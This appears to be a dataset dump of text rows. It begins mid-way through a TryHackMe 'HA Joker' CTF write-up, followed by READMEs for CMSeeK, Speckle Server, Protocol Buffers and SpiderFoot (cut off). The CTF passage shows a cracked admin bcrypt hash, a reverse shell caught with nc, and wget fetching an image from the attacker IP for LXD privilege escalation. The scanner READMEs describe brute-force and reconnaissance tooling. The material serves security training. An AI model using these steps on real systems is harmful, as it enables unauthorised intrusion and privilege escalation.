`cc1gr_users`\nLOCK TABLES `cc1gr_users` WRITE;\n/*!40000 ALTER TABLE `cc1gr_users` DISABLE KEYS */;\nINSERT INTO `cc1gr_users` VALUES (547,'Super Duper User','admin','admin@example.com','$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG',0,1,'2019-10-08 12:00:15','2019-10-25 15:20:02','0','{\\\"admin_style\\\":\\\"\\\",\\\"admin_language\\\":\\\"\\\",\\\"language\\\":\\\"\\\",\\\"editor\\\":\\\"\\\",\\\"helpsite\\\":\\\"\\\",\\\"timezone\\\":\\\"\\\"}','0000-00-00 00:00:00',0,'','',0);\n/*!40000 ALTER TABLE `cc1gr_users` ENABLE KEYS */;\nkali@kali:~/CTFs/tryhackme/HA Joker CTF$\n```\n\n`admin`\n\n5. Super Duper User! What is the password?\n\n```\nkali@kali:~/CTFs/tryhackme/HA Joker CTF$ john admin.hash /usr/share/wordlists/rockyou.txt --format=bcrypt\nWarning: invalid UTF-8 seen reading /usr/share/wordlists/rockyou.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (bcrypt [Blowfish 32/64 X3])\nCost 1 (iteration count) is 1024 for all loaded hashes\nWill run 2 OpenMP threads\nProceeding with single, rules:Single\nPress 'q' or Ctrl-C to abort, almost any other key for status\nAlmost done: Processing the remaining buffered candidate passwords, if any.\nProceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist\nabcd1234 (?)\n1g 0:00:00:09 DONE 2/3 (2020-10-08 20:39) 0.1076g/s 79.44p/s 79.44c/s 79.44C/s yellow..allison\nUse the \"--show\" option to display all of the cracked passwords reliably\nSession completed\nkali@kali:~/CTFs/tryhackme/HA Joker CTF$\n```\n\n`abcd1234`\n\n7. At this point, you should be upload a reverse-shell in order to gain shell access. What is the owner of this session?\n\n[http://10.10.252.64:8080/administrator/index.php?option=com_templates&view=template&id=503&file=L2Vycm9yLnBocA%3D%3D](http://10.10.252.64:8080/administrator/index.php?option=com_templates&view=template&id=503&file=L2Vycm9yLnBocA%3D%3D)\n\n![](2020-10-08_20-43.png)\n\n[http://10.10.252.64:8080/templates/beez3/error.php](http://10.10.252.64:8080/templates/beez3/error.php)\n\n```\nkali@kali:~/CTFs/tryhackme/HA Joker CTF$ nc -nlvp 9001\nlistening on [any] 9001 ...\nconnect to [10.8.106.222] from (UNKNOWN) [10.10.252.64] 43184\nLinux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux\n 11:46:07 up 53 min, 0 users, load average: 0.00, 0.00, 0.00\nUSER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT\nuid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)\n/bin/sh: 0: can't access tty; job control turned off\n$\n```\n\n`www-data`\n\n8. This user belongs to a group that differs on your own group, What is this group?\n\n`lxd`\n\n10. Spawn a tty shell.\n\n`SHELL=/bin/bash script -q /dev/null`\n\n11. In this question you should be do a basic research on how linux containers (LXD) work, it has a small online tutorial. Googling \"lxd try it online\".\n\n[https://linuxcontainers.org/lxd/introduction/](https://linuxcontainers.org/lxd/introduction/)\n\n13. Research how to escalate privileges using LXD permissions and check to see if there are any images available on the box.\n\n```\nwww-data@ubuntu:/$ cd ~\ncd ~\nwww-data@ubuntu:/var/www$ wget http://10.8.106.222/alpine-v3.12-x86_64-20201008_2055.tar.gz\n<.8.106.222/alpine-v3.12-x86_64-20201008_2055.tar.gz\n--2020-10-08 11:58:36-- http://10.8.106.222/alpine-v3.12-x86_64-20201008_2055.tar.gz\nConnecting to 10.8.106.222:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 3183740 (3.0M) [application/gzip]\nSaving to: 'alpine-v3.12-x86_64-20201008_2055.tar.gz'\n2020-10-08 11:58:38 (1.56 MB/s) - 'alpine-v3.12-x86_64-20201008_2055.tar.gz' saved [3183740/3183740]\nwww-data@ubuntu:/var/www$ lxc image import alpine-v3.12-x86_64-20201008_2055.tar.gz --alias myalpine\n\r\n \"Logo\"
\r\n \"version\"\r\n \"Python\r\n \"GitHub\r\n \"GitHub\r\n \"Rawsec's\r\n \"Twitter\"\r\n

\r\n\r\n## What is a CMS?\r\n> A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: *WordPress, Joomla, Drupal etc*.\r\n\r\n## Release History\r\n```\r\n- Version 1.1.1 [01-02-2019]\r\n- Version 1.1.0 [28-08-2018]\r\n- Version 1.0.9 [21-08-2018]\r\n- Version 1.0.8 [14-08-2018]\r\n- Version 1.0.7 [07-08-2018]\r\n...\r\n```\r\n[Changelog File](https://github.com/Tuhinshubhra/CMSeeK/blob/master/CHANGELOG)\r\n\r\n## Functions Of CMSeek:\r\n\r\n- Basic CMS Detection of over 155 CMS\r\n- Drupal version detection\r\n- Advanced Wordpress Scans\r\n - Detects Version\r\n - User Enumeration\r\n - Plugins Enumeration\r\n - Theme Enumeration\r\n - Detects Users (3 Detection Methods)\r\n - Looks for Version Vulnerabilities and much more!\r\n- Advanced Joomla Scans\r\n - Version detection\r\n - Backup files finder\r\n - Admin page finder\r\n - Core vulnerability detection\r\n - Directory listing check\r\n - Config leak detection\r\n - Various other checks\r\n- Modular bruteforce system\r\n - Use pre made bruteforce modules or create your own and integrate with it\r\n\r\n## Requirements and Compatibility:\r\n\r\nCMSeeK is built using **python3**, you will need python3 to run this tool and is compitable with **unix based systems** as of now. Windows support will be added later. CMSeeK relies on **git** for auto-update so make sure git is installed.\r\n\r\n## Installation and Usage:\r\n\r\nIt is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands:\r\n\r\n- git clone `https://github.com/Tuhinshubhra/CMSeeK`\r\n- cd CMSeeK\r\n- pip/pip3 install -r requirements.txt\r\n\r\nFor guided scanning:\r\n\r\n- python3 cmseek.py\r\n\r\nElse:\r\n\r\n- python3 cmseek.py -u [...]\r\n\r\nHelp menu from the program:\r\n\r\n```\r\nUSAGE:\r\n python3 cmseek.py (for a guided scanning) OR\r\n python3 cmseek.py [OPTIONS] \r\n\r\nSPECIFING TARGET:\r\n -u URL, --url URL Target Url\r\n -l LIST, -list LIST path of the file containing list of sites\r\n for multi-site scan (comma separated)\r\nRE-DIRECT:\r\n --follow-redirect Follows all/any redirect(s)\r\n --no-redirect Skips all redirects and tests the input target(s)\r\n\r\nUSER AGENT:\r\n -r, --random-agent Use a random user agent\r\n --googlebot Use Google bot user agent\r\n --user-agent USER_AGENT Specify a custom user agent\r\n\r\nOUTPUT:\r\n -v, --verbose Increase output verbosity\r\n\r\nVERSION & UPDATING:\r\n --update Update CMSeeK (Requires git)\r\n --version Show CMSeeK version and exit\r\n\r\nHELP & MISCELLANEOUS:\r\n -h, --help Show this help message and exit\r\n --clear-result Delete all the scan result\r\n\r\nEXAMPLE USAGE:\r\n python3 cmseek.py -u example.com # Scan example.com\r\n python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated)\r\n python3 cmseek.py -u example.com --user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here\r\n python3 cmseek.py -u example.com --random-agent # Scan example.com using a random user-Agent\r\n python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.com\r\n\r\n```\r\n\r\n## Checking For Update:\r\n\r\nYou can check for update either from the main menu or use `python3 cmseek.py --update` to check for update and apply auto update.\r\n\r\nP.S: Please make sure you have `git` installed, CMSeeK uses git to apply auto update.\r\n\r\n## Detection Methods:\r\n\r\nCMSeek detects CMS via the following:\r\n- HTTP Headers\r\n- Generator meta tag\r\n- Page source code\r\n- robots.txt\r\n\r\n## Supported CMSs:\r\n\r\nCMSeeK currently can detect **157** CMS. Check the list here: [cmss.py](https://github.com/Tuhinshubhra/CMSeeK/blob/master/cmseekdb/cmss.py) file which is present in the `cmseekdb` directory.\r\nAll the cmss are stored in the following way:\r\n```\r\n cmsID = {\r\n 'name':'Name Of CMS',\r\n 'url':'Official URL of the CMS',\r\n 'vd':'Version Detection (0 for no, 1 for yes)',\r\n 'deeps':'Deep Scan (0 for no 1 for yes)'\r\n }\r\n```\r\n\r\n## Scan Result:\r\n\r\nAll of your scan results are stored in a json file named `cms.json`, you can find the logs inside the `Result\\` directory, and as of the bruteforce results they're stored in a txt file under the site's result directory as well.\r\n\r\nHere is an example of the json report log:\r\n\r\n![Json Log](https://i.imgur.com/5dA9jQg.png)\r\n\r\n## Bruteforce Modules:\r\n\r\nCMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this:\r\n\r\n1. Add a comment exactly like this `# Bruteforce module`. This will help CMSeeK to know the name of the CMS using regex\r\n\r\n2. Add another comment `### cmseekbruteforcemodule`, this will help CMSeeK to know it is a module\r\n\r\n3. Copy and paste the module in the `brutecms` directory under CMSeeK's directory\r\n\r\n4. Open CMSeeK and Rebuild Cache using `U` as the input in the first menu.\r\n\r\n5. If everything is done right you'll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK.\r\n\r\n

\r\n \"Cache\r\n

\r\n\r\n## Need More Reasons To Use CMSeeK?\r\n\r\nIf not anything you can always enjoy exiting CMSeeK *(please don't)*, it will bid you goodbye in a random goodbye message in various languages.\r\n\r\nAlso you can try reading comments in the code those are pretty random and weird!!!\r\n\r\n## Screenshots:\r\n\r\n

\r\n \"Main\r\n
Main Menu
\r\n \"Scan\r\n
Scan Result
\r\n \"WordPress\r\n
WordPress Scan Result
\r\n

\r\n\r\n## Guidelines for opening an issue:\r\n\r\nPlease make sure you have the following info attached when opening a new issue:\r\n- Target\r\n- Exact copy of error or screenshot of error\r\n- Your operating system and python version\r\n\r\n**Issues without these informations might not be answered!**\r\n\r\n## Disclaimer:\r\n\r\n**Usage of CMSeeK for testing or exploiting websites without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.**\r\n\r\n## License:\r\n\r\nCMSeeK is licensed under [GNU General Public License v3.0](https://github.com/Tuhinshubhra/CMSeeK/blob/master/LICENSE)\r\n\r\n## Follow Me @r3dhax0r:\r\n\r\n[Twitter](https://twitter.com/r3dhax0r) \r\n\r\n## Team:\r\n\r\n[Team : Virtually Unvoid Defensive (VUD)](https://twitter.com/virtuallyunvoid)\r\n"}}},{"rowIdx":551,"cells":{"text":{"kind":"string","value":"

\n
\n Speckle | Server\n

\n

\n Server and Web packages\n

\n

Speckle is data infrastructure for the AEC industry.


\n\n

\"Twitter \"Community \"website\" \"docs\"

\n

\"Speckle-Next\" \"codecov\"

\n\n# About Speckle\n\nWhat is Speckle? Check our [![YouTube Video Views](https://img.shields.io/youtube/views/B9humiSpHzM?label=Speckle%20in%201%20minute%20video&style=social)](https://www.youtube.com/watch?v=B9humiSpHzM)\n\n### Features\n\n- **Object-based:** say goodbye to files! Speckle is the first object based platform for the AEC industry\n- **Version control:** Speckle is the Git & Hub for geometry and BIM data\n- **Collaboration:** share your designs collaborate with others\n- **3D Viewer:** see your CAD and BIM models online, share and embed them anywhere\n- **Interoperability:** get your CAD and BIM models into other software without exporting or importing\n- **Real time:** get real time updates and notifications and changes\n- **GraphQL API:** get what you need anywhere you want it\n- **Webhooks:** the base for a automation and next-gen pipelines\n- **Built for developers:** we are building Speckle with developers in mind and got tools for every stack\n- **Built for the AEC industry:** Speckle connectors are plugins for the most common software used in the industry such as Revit, Rhino, Grasshopper, AutoCAD, Civil 3D, Excel, Unreal Engine, Unity, QGIS, Blender and more!\n\n### Try Speckle now!\n\nGive Speckle a try in no time by:\n\n- [![speckle XYZ](https://img.shields.io/badge/https://-speckle.xyz-0069ff?style=flat-square&logo=hackthebox&logoColor=white)](https://speckle.xyz) ⇒ creating an account at \n- [![create a droplet](https://img.shields.io/badge/Create%20a%20Droplet-0069ff?style=flat-square&logo=digitalocean&logoColor=white)](https://marketplace.digitalocean.com/apps/speckle-server?refcode=947a2b5d7dc1) ⇒ deploying an instance in 1 click \n\n### Resources\n\n- [![Community forum users](https://img.shields.io/badge/community-forum-green?style=for-the-badge&logo=discourse&logoColor=white)](https://speckle.community) for help, feature requests or just to hang with other speckle enthusiasts, check out our community forum!\n- [![website](https://img.shields.io/badge/tutorials-speckle.systems-royalblue?style=for-the-badge&logo=youtube)](https://speckle.systems) our tutorials portal is full of resources to get you started using Speckle\n- [![docs](https://img.shields.io/badge/docs-speckle.guide-orange?style=for-the-badge&logo=read-the-docs&logoColor=white)](https://speckle.guide/dev/) reference on almost any end-user and developer functionality\n\n\n# Repo structure\n\nThis monorepo is the home of the Speckle v2 web packages:\n\n- [`packages/server`](https://github.com/specklesystems/speckle-server/blob/main/packages/server): the Server, a nodejs app. Core external dependencies are a Redis and Postgresql db.\n- [`packages/frontend`](https://github.com/specklesystems/speckle-server/blob/main/packages/frontend): the Frontend, a static Vue app.\n- [`packages/viewer`](https://github.com/specklesystems/speckle-server/blob/main/packages/viewer): a threejs extension that allows you to display 3D data [![npm version](https://camo.githubusercontent.com/dc69232cc57b77de6554e752dd6dfc60ca0ecdfbe91bdfcbf7c7531a511ec200/68747470733a2f2f62616467652e667572792e696f2f6a732f253430737065636b6c652532467669657765722e737667)](https://www.npmjs.com/package/@speckle/viewer)\n- [`packages/objectloader`](https://github.com/specklesystems/speckle-server/blob/main/packages/objectloader): a small js utility class that helps you stream an object and all its sub-components from the Speckle Server API. [![npm version](https://camo.githubusercontent.com/4d4f1e38ce50aaf11b4a3ad8e01ce3eaaa561dc5fd08febbae556f52f1d41097/68747470733a2f2f62616467652e667572792e696f2f6a732f253430737065636b6c652532466f626a6563746c6f616465722e737667)](https://www.npmjs.com/package/@speckle/objectloader)\n- [`packages/preview-service`](https://github.com/specklesystems/speckle-server/blob/main/packages/preview-service): generates object previews for Speckle Objects headlessly. This package is meant to be called on by the server.\n- [`webhook-service`](https://github.com/specklesystems/speckle-server/tree/main/packages/webhook-service): the Webhook service\n\n### Other repos\n\nMake sure to also check and ⭐️ these other Speckle repositories:\n\n- [`speckle-sharp`](https://github.com/specklesystems/speckle-sharp): .NET tooling, connectors and interoperability\n- [`specklepy`](https://github.com/specklesystems/specklepy): Python SDK 🐍\n- [`speckle-excel`](https://github.com/specklesystems/speckle-excel): Excel connector\n- [`speckle-unity`](https://github.com/specklesystems/speckle-unity): Unity 3D connector\n- [`speckle-blender`](https://github.com/specklesystems/speckle-blender): Blender connector\n- [`speckle-unreal`](https://github.com/specklesystems/speckle-unreal): Unreal Engine Connector\n- [`speckle-qgis`](https://github.com/specklesystems/speckle-qgis): QGIS connectod\n- [`speckle-powerbi`](https://github.com/specklesystems/speckle-powerbi): PowerBi connector\n- and more [connectos & tooling](https://github.com/specklesystems/)!\n\n\n\n## Developing and Debugging\n\nHave you checked our [dev docs](https://speckle.guide/dev/)?\n\nWe have a detailed section on [deploying a Speckle server](https://speckle.guide/dev/server-setup.html). To get started developing locally, you can see the [run in development mode](https://speckle.guide/dev/server-setup.html#run-in-development-mode) chapter.\n\n### Contributing\n\nPlease make sure you read the [contribution guidelines](https://github.com/specklesystems/speckle-server/blob/main/CONTRIBUTING.md) for an overview of the best practices we try to follow.\n\nWhen pushing commits to this repo, please follow the following guidelines:\n\n- Install [commitizen](https://www.npmjs.com/package/commitizen#commitizen-for-contributors) globally (`npm i -g commitizen`).\n- When ready to commit, `git cz` & follow the prompts.\n- Please use either `server` or `frontend` as the scope of your commit.\n\n### Security\n\nFor any security vulnerabilities or concerns, please contact us directly at security[at]speckle.systems.\n\n### License\n\nUnless otherwise described, the code in this repository is licensed under the Apache-2.0 License. Please note that some modules, extensions or code herein might be otherwise licensed. This is indicated either in the root of the containing folder under a different license file, or in the respective file's header. If you have any questions, don't hesitate to get in touch with us via [email](mailto:hello@speckle.systems).\n"}}},{"rowIdx":552,"cells":{"text":{"kind":"string","value":"Protocol Buffers - Google's data interchange format\n===================================================\n\nCopyright 2008 Google Inc.\n\nhttps://developers.google.com/protocol-buffers/\n\nC++ Installation - Unix\n-----------------------\n\nTo build protobuf from source, the following tools are needed:\n\n * autoconf\n * automake\n * libtool\n * make\n * g++\n * unzip\n\nOn Ubuntu/Debian, you can install them with:\n\n sudo apt-get install autoconf automake libtool curl make g++ unzip\n\nOn other platforms, please use the corresponding package managing tool to\ninstall them before proceeding.\n\nTo get the source, download one of the release .tar.gz or .zip packages in the\nrelease page:\n\n https://github.com/protocolbuffers/protobuf/releases/latest\n\nFor example: if you only need C++, download `protobuf-cpp-[VERSION].tar.gz`; if\nyou need C++ and Java, download `protobuf-java-[VERSION].tar.gz` (every package\ncontains C++ source already); if you need C++ and multiple other languages,\ndownload `protobuf-all-[VERSION].tar.gz`.\n\nYou can also get the source by \"git clone\" our git repository. Make sure you\nhave also cloned the submodules and generated the configure script (skip this\nif you are using a release .tar.gz or .zip package):\n\n git clone https://github.com/protocolbuffers/protobuf.git\n cd protobuf\n git submodule update --init --recursive\n ./autogen.sh\n\nTo build and install the C++ Protocol Buffer runtime and the Protocol\nBuffer compiler (protoc) execute the following:\n\n\n ./configure\n make -j$(nproc) # $(nproc) ensures it uses all cores for compilation\n make check\n sudo make install\n sudo ldconfig # refresh shared library cache.\n\nIf \"make check\" fails, you can still install, but it is likely that\nsome features of this library will not work correctly on your system.\nProceed at your own risk.\n\nFor advanced usage information on configure and make, please refer to the\nautoconf documentation:\n\n http://www.gnu.org/software/autoconf/manual/autoconf.html#Running-configure-Scripts\n\n**Hint on install location**\n\nBy default, the package will be installed to /usr/local. However,\non many platforms, /usr/local/lib is not part of LD_LIBRARY_PATH.\nYou can add it, but it may be easier to just install to /usr\ninstead. To do this, invoke configure as follows:\n\n ./configure --prefix=/usr\n\nIf you already built the package with a different prefix, make sure\nto run \"make clean\" before building again.\n\n**Compiling dependent packages**\n\nTo compile a package that uses Protocol Buffers, you need to pass\nvarious flags to your compiler and linker. As of version 2.2.0,\nProtocol Buffers integrates with pkg-config to manage this. If you\nhave pkg-config installed, then you can invoke it to get a list of\nflags like so:\n\n\n pkg-config --cflags protobuf # print compiler flags\n pkg-config --libs protobuf # print linker flags\n pkg-config --cflags --libs protobuf # print both\n\n\nFor example:\n\n c++ my_program.cc my_proto.pb.cc `pkg-config --cflags --libs protobuf`\n\nNote that packages written prior to the 2.2.0 release of Protocol\nBuffers may not yet integrate with pkg-config to get flags, and may\nnot pass the correct set of flags to correctly link against\nlibprotobuf. If the package in question uses autoconf, you can\noften fix the problem by invoking its configure script like:\n\n\n configure CXXFLAGS=\"$(pkg-config --cflags protobuf)\" \\\n LIBS=\"$(pkg-config --libs protobuf)\"\n\nThis will force it to use the correct flags.\n\nIf you are writing an autoconf-based package that uses Protocol\nBuffers, you should probably use the PKG_CHECK_MODULES macro in your\nconfigure script like:\n\n PKG_CHECK_MODULES([protobuf], [protobuf])\n\nSee the pkg-config man page for more info.\n\nIf you only want protobuf-lite, substitute \"protobuf-lite\" in place\nof \"protobuf\" in these examples.\n\n**Note for Mac users**\n\nFor a Mac system, Unix tools are not available by default. You will first need\nto install Xcode from the Mac AppStore and then run the following command from\na terminal:\n\n sudo xcode-select --install\n\nTo install Unix tools, you can install \"port\" following the instructions at\nhttps://www.macports.org . This will reside in /opt/local/bin/port for most\nMac installations.\n\n sudo /opt/local/bin/port install autoconf automake libtool\n\nThen follow the Unix instructions above.\n\n**Note for cross-compiling**\n\nThe makefiles normally invoke the protoc executable that they just\nbuilt in order to build tests. When cross-compiling, the protoc\nexecutable may not be executable on the host machine. In this case,\nyou must build a copy of protoc for the host machine first, then use\nthe --with-protoc option to tell configure to use it instead. For\nexample:\n\n ./configure --with-protoc=protoc\n\nThis will use the installed protoc (found in your $PATH) instead of\ntrying to execute the one built during the build process. You can\nalso use an executable that hasn't been installed. For example, if\nyou built the protobuf package for your host machine in ../host,\nyou might do:\n\n ./configure --with-protoc=../host/src/protoc\n\nEither way, you must make sure that the protoc executable you use\nhas the same version as the protobuf source code you are trying to\nuse it with.\n\n**Note for Solaris users**\n\nSolaris 10 x86 has a bug that will make linking fail, complaining\nabout libstdc++.la being invalid. We have included a work-around\nin this package. To use the work-around, run configure as follows:\n\n ./configure LDFLAGS=-L$PWD/src/solaris\n\nSee src/solaris/libstdc++.la for more info on this bug.\n\n**Note for HP C++ Tru64 users**\n\nTo compile invoke configure as follows:\n\n ./configure CXXFLAGS=\"-O -std ansi -ieee -D__USE_STD_IOSTREAM\"\n\nAlso, you will need to use gmake instead of make.\n\n**Note for AIX users**\n\nCompile using the IBM xlC C++ compiler as follows:\n\n ./configure CXX=xlC\n\nAlso, you will need to use GNU `make` (`gmake`) instead of AIX `make`.\n\nC++ Installation - Windows\n--------------------------\n\nIf you only need the protoc binary, you can download it from the release\npage:\n\n https://github.com/protocolbuffers/protobuf/releases/latest\n\nIn the downloads section, download the zip file protoc-$VERSION-win32.zip.\nIt contains the protoc binary as well as public proto files of protobuf\nlibrary.\n\nProtobuf and its dependencies can be installed directly by using `vcpkg`:\n\n >vcpkg install protobuf protobuf:x64-windows\n\nIf zlib support is desired, you'll also need to install the zlib feature:\n\n >vcpkg install protobuf[zlib] protobuf[zlib]:x64-windows\n\nSee https://github.com/Microsoft/vcpkg for more information.\n\nTo build from source using Microsoft Visual C++, see [cmake/README.md](../cmake/README.md).\n\nTo build from source using Cygwin or MinGW, follow the Unix installation\ninstructions, above.\n\nBinary Compatibility Warning\n----------------------------\n\nDue to the nature of C++, it is unlikely that any two versions of the\nProtocol Buffers C++ runtime libraries will have compatible ABIs.\nThat is, if you linked an executable against an older version of\nlibprotobuf, it is unlikely to work with a newer version without\nre-compiling. This problem, when it occurs, will normally be detected\nimmediately on startup of your app. Still, you may want to consider\nusing static linkage. You can configure this package to install\nstatic libraries only using:\n\n ./configure --disable-shared\n\nUsage\n-----\n\nThe complete documentation for Protocol Buffers is available via the\nweb at:\n\nhttps://developers.google.com/protocol-buffers/\n"}}},{"rowIdx":553,"cells":{"text":{"kind":"string","value":"\n\n\n[![License](https://img.shields.io/badge/license-GPLv2-blue.svg)](https://raw.githubusercontent.com/smicallef/spiderfoot/master/LICENSE)\n[![Python Version](https://img.shields.io/badge/python-3.6+-green)](https://www.python.org)\n[![Stable Release](https://img.shields.io/badge/version-3.1-blue.svg)](https://github.com/smicallef/spiderfoot/releases/tag/v3.1)\n[![CI Status](https://img.shields.io/travis/smicallef/spiderfoot)](https://travis-ci.com/github/smicallef/spiderfoot)\n[![Last Commit](https://img.shields.io/github/last-commit/smicallef/spiderfoot)](https://github.com/smicallef/spiderfoot/commits/master)\n[![Libraries.io dependency status for latest release](https://img.shields.io/librariesio/release/github/smicallef/spiderfoot)](https://libraries.io/github/smicallef/spiderfoot)\n[![Twitter Follow](https://img.shields.io/twitter/follow/spiderfoot?label=follow&style=social)](https://twitter.com/spiderfoot)\n\n**SpiderFoot** is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate. \n\nSpiderFoot has an embedded web-server for providing a clean and intuitive web-based interface but can also be used completely via the command-line. It's written in **Python 3** and **GPL-licensed**.\n\n\n\n### FEATURES\n\n- Web based UI or CLI\n- Over 170 modules (see below)\n- Python 3\n- CSV/JSON/GEXF export\n- API key export/import\n- SQLite back-end for custom querying\n- Highly configurable\n- Fully documented\n- Visualisations\n- TOR integration for dark web searching\n- Dockerfile for Docker-based deployments\n- Can call other tools like DNSTwist, Whatweb and CMSeeK\n- Actively developed since 2012!\n\n### USES\n\nSpiderFoot can be used offensively (e.g. in a red team exercise or penetration test) for reconnaissance of your target or defensively to gather information about what you or your organisation might have exposed over the Internet.\n\nYou can target the following entities in a SpiderFoot scan:\n\n - IP address\n - Domain/sub-domain name\n - Hostname\n - Network subnet (CIDR)\n - ASN\n - E-mail address\n - Phone number\n - Username\n - Person's name\n \nSpiderFoot's 170+ modules feed each other in a publisher/subscriber model to ensure maximum data extraction to do things like:\n\n- Host/sub-domain/TLD enumeration/extraction\n- E-mail address enumeration/extraction\n- Phone number extraction\n- Bitcoin and Ethereum address extraction\n- DNS zone transfers\n- Threat intelligence and Blacklist queries\n- API integraiton with SHODAN, HaveIBeenPwned, Censys, AlienVault, SecurityTrails, etc.\n- Social media account enumeration\n- S3/Azure/Digitalocean bucket enumeration/scraping\n- IP geo-location\n- Web scraping, web content analysis\n- Image and binary file meta data analysis\n- Office document meta data analysis\n- Dark web searches\n- So much more...\n\nSee it in action here, performing some DNS recon:\n\n[![asciicast](https://asciinema.org/a/295912.svg)](https://asciinema.org/a/295912)\n\n\n### MODULES\n\n| Module | Name | Description |\n| :------------- |:-------------| :------------|\nsfp_abusech.py|abuse.ch|Check if a host/domain, IP or netblock is malicious according to abuse.ch.|\nsfp_abuseipdb.py|AbuseIPDB|Check if a netblock or IP is malicious according to AbuseIPDB.com.|\nsfp_accounts.py|Accounts|Look for possible associated accounts on nearly 200 websites like Ebay, Slashdot, reddit, etc.|\nsfp_adblock.py|AdBlock Check|Check if linked pages would be blocked by AdBlock Plus.|\nsfp_ahmia.py|Ahmia|Search Tor 'Ahmia' search engine for mentions of the target domain.|\nsfp_alienvaultiprep.py|AlienVault IP Reputation|Check if an IP or netblock is malicious according to the AlienVault IP Reputation database.|\nsfp_alienvault.py|AlienVault OTX|Obtain information from AlienVault Open Threat Exchange (OTX)|\nsfp_apility.py|Apility|Search Apility API for IP address and domain reputation.|\nsfp_archiveorg.py|Archive.org|Identifies historic versions of interesting files/pages from the Wayback Machine.|\nsfp_arin.py|ARIN|Queries ARIN registry for contact information.|\nsfp_azureblobstorage.py|Azure Blob Finder|Search for potential Azure blobs associated with the target and attempt to list their contents.|\nsfp_badipscom.py|badips.com|Check if a domain or IP is malicious according to badips.com.|\nsfp_bambenek.py|Bambenek C&C List|Check if a host/domain or IP appears on Bambenek Consulting's C&C tracker lists.|\nsfp_base64.py|Base64|Identify Base64-encoded strings in any content and URLs, often revealing interesting hidden information.|\nsfp_bgpview.py|BGPView|Obtain network information from BGPView API.|\nsfp_binaryedge.py|BinaryEdge|Obtain information from BinaryEdge.io's Internet scanning systems about breaches, vulerabilities, torrents and passive DNS.|\nsfp_bingsearch.py|Bing|Obtain information from bing to identify sub-domains and links.|\nsfp_bingsharedip.py|Bing (Shared IPs)|Search Bing for hosts sharing the same IP.|\nsfp_binstring.py|Binary String Extractor|Attempt to identify strings in binary content.|\nsfp_bitcoin.py|Bitcoin Finder|Identify bitcoin addresses in scraped webpages.|\nsfp_blockchain.py|Blockchain|Queries blockchain.info to find the balance of identified bitcoin wallet addresses.|\nsfp_blocklistde.py|blocklist.de|Check if a netblock or IP is malicious according to blocklist.de.|\nsfp_botscout.py|BotScout|Searches botscout.com's database of spam-bot IPs and e-mail addresses.|\nsfp_builtwith.py|BuiltWith|Query BuiltWith.com's Domain API for information about your target's web technology stack, e-mail addresses and more.|\nsfp_callername.py|CallerName|Lookup US phone number location and reputation information.|\nsfp_censys.py|Censys|Obtain information from Censys.io|\nsfp_cinsscore.py|CINS Army List|Check if a netblock or IP is malicious according to cinsscore.com's Army List.|\nsfp_circllu.py|CIRCL.LU|Obtain information from CIRCL.LU's Passive DNS and Passive SSL databases.|\nsfp_citadel.py|Citadel Engine|Searches Leak-Lookup.com's database of breaches.|\nsfp_cleanbrowsing.py|Cleanbrowsing.org|Check if a host would be blocked by Cleanbrowsing.org DNS|\nsfp_cleantalk.py|CleanTalk Spam List|Check if an IP is on CleanTalk.org's spam IP list.|\nsfp_clearbit.py|Clearbit|Check for names, addresses, domains and more based on lookups of e-mail addresses on clearbit.com.|\nsfp_coinblocker.py|CoinBlocker Lists|Check if a host/domain or IP appears on CoinBlocker lists.|\nsfp_commoncrawl.py|CommonCrawl|Searches for URLs found through CommonCrawl.org.|\nsfp_comodo.py|Comodo|Check if a host would be blocked by Comodo DNS|\nsfp_company.py|Company Names|Identify company names in any obtained data.|\nsfp_cookie.py|Cookies|Extract Cookies from HTTP headers.|\nsfp_crossref.py|Cross-Reference|Identify whether other domains are associated ('Affiliates') of the target.|\nsfp_crt.py|Certificate Transparency|Gather hostnames from historical certificates in crt.sh.|\nsfp_customfeed.py|Custom Threat Feed|Check if a host/domain, netblock, ASN or IP is malicious according to your custom feed.|\nsfp_cybercrimetracker.py|cybercrime-tracker.net|Check if a host/domain or IP is malicious according to cybercrime-tracker.net.|\nsfp_darksearch.py|Darksearch|Search the Darksearch.io Tor search engine for mentions of the target domain.|\nsfp_digitaloceanspace.py|Digital Ocean Space Finder|Search for potential Digital Ocean Spaces associated with the target and attempt to list their contents.|\nsfp_dnsbrute.py|DNS Brute-force|Attempts to identify hostnames through brute-forcing common names and iterations.|\nsfp_dnscommonsrv.py|DNS Common SRV|Attempts to identify hostnames through common SRV.|\nsfp_dnsneighbor.py|DNS Look-aside|Attempt to reverse-resolve the IP addresses next to your target to see if they are related.|\nsfp_dnsraw.py|DNS Raw Records|Retrieves raw DNS records such as MX, TXT and others.|\nsfp_dnsresolve.py|DNS Resolver|Resolves Hosts and IP Addresses identified, also extracted from raw content.|\nsfp_dnszonexfer.py|DNS Zone Transfer|Attempts to perform a full DNS zone transfer.|\nsfp_dronebl.py|DroneBL|Query the DroneBL database for open relays, open proxies, vulnerable servers, etc.|\nsfp_duckduckgo.py|DuckDuckGo|Query DuckDuckGo's API for descriptive information about your target.|\nsfp_emailformat.py|EmailFormat|Look up e-mail addresses on email-format.com.|\nsfp_email.py|E-Mail|Identify e-mail addresses in any obtained data.|\nsfp_emailrep.py|EmailRep|Search EmailRep.io for email address reputation.|\nsfp_errors.py|Errors|Identify common error messages in content like SQL 